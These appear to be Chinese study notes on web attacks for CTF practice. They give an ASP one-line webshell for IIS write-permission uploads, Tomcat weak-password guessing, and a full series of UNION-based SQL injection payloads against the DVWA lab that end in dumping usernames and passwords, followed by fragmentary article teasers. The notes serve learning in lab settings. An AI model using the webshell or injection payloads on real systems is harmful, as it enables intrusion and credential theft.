一、iis write漏洞利用
先用工具掃瞄,再上傳小馬,使用菜刀連線即可。
思考點:
如何獲知是一台iis站點?
本例中上傳的一句話木馬是什麼意思?
<%eval request("mh")%>
二、tomcat伺服器漏洞利用
先用nmap掃瞄埠開放資訊。
然後利用metasploit或者apache tomcat.exe工具裡面的掃瞄辦法來掃瞄弱口令。
需要注意的是,對於管理員賬號的猜測,可以猜測admin、root、administrator等。
三、sql 手工注入(以dvwa為例)(參考
1、判斷字段總數:
admin,password登入dvwa後,將安全級別調至低。進入sql injection介面。
輸入1』 報錯。確認有注入漏洞。
輸入1' order by 2#正常返回結果。輸入1' order by 3# 報錯。表明資料庫只有兩列。order by 後面跟的應該是第幾列的列數。這樣看來資料庫表只有兩列。結尾的#號用於截斷sql語句,以免報錯。也可以換做-- -
2、判斷顯示位
1' union select 1,2# 可以看到1,2分別顯示在first name和sur name處。
3、顯當前示資料庫和版本資訊。
1' union select database(),version()#
4、顯示所有資料庫的名稱
1' union select schema_name,1 frominformation_schema.schemata#
5、顯示當前資料庫表名
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
可以看到當前資料庫表名:guestbook,users
6、查詢列名:
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
7、查詢資料值
1' union select group_concat(user,password),3 from users#
其中user和password是上一步得出的結果。
也可以寫作
1' union select user,password from users#
四、php
1、strcmp漏洞
1、http post工具:
2、解碼加密工具:
十、ctf大賽本身學習
1、鵬越ctf學霸專區
2、3、強網杯
4、xctf(南京賽寧)
CTF系列 攻防世界 nizhuansiwei
相關資訊 hint 無 進入 後,便能顯示原始碼,是一道 審計題目。text get text file get file password get password text 需要等於 welcomeif isset text file get contents text r welcome to...
Webmail攻防實戰
webmail是指利用瀏覽器通過web方式來收發電子郵件的服務或技術,不需借助郵件客戶端,可以說只要能上網就能使用webmail,極大地方便了使用者對郵件的收發。對於不能熟練使用郵件客戶端,或者在網咖不便使用郵件客戶端的使用者來說,webmail更是必不可少的選擇。email能夠成為當今intern...
CTF後門入侵系統 攻防世界
php filter是php中特有協議流,中間流 來處理其他流,就比如可以用 post請求通過base64將php原始碼編譯並輸出 localhost 80 index.php?php filter write convert.base64 decode resource index.php 輸出的...